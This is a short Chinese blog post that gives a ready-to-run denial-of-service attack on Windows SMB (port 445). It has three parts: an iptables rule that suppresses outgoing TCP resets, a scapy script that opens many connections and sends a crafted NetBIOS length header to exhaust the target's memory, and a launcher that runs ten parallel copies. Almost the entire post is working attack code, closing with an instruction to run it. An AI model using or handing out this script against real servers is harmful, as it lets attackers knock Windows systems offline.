版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396567
参考:https://v.qq.com/x/page/d0532b3e7p6.html?start=36
http://www.freebuf.com/news/142697.html
目标开放445端口,windows系统。
攻击者kali最新版(2017年8月3日 21:42:20)
cat rst.sh
#!/bin/bash
iptables -F
iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP
cat smb3.py
from scapy.all import *
import sys
p0 = int(sys.argv[1])
conf.L3socket
conf.L3socket=L3RawSocket
i=IP()
i.dst="目标IP"
t=TCP()
t.dport=445
for p in range(p0,p0+700):
print p
t.sport = p
t.flags = "S"
r=sr1(i/t)
rt=r[TCP]
t.ack=rt.seq+1
t.seq=rt.ack
t.flags="A"
sbss='\x00\x01\xff\xff'
send(i/t/sbss)
cat run10.sh
#!/bin/bash
python smb3.py 0 &
python smb3.py 1000 &
python smb3.py 2000 &
python smb3.py 3000 &
python smb3.py 4000 &
python smb3.py 5000 &
python smb3.py 6000 &
python smb3.py 7000 &
python smb3.py 8000 &
python smb3.py 9000 &
运行run10.sh开始攻击测试。
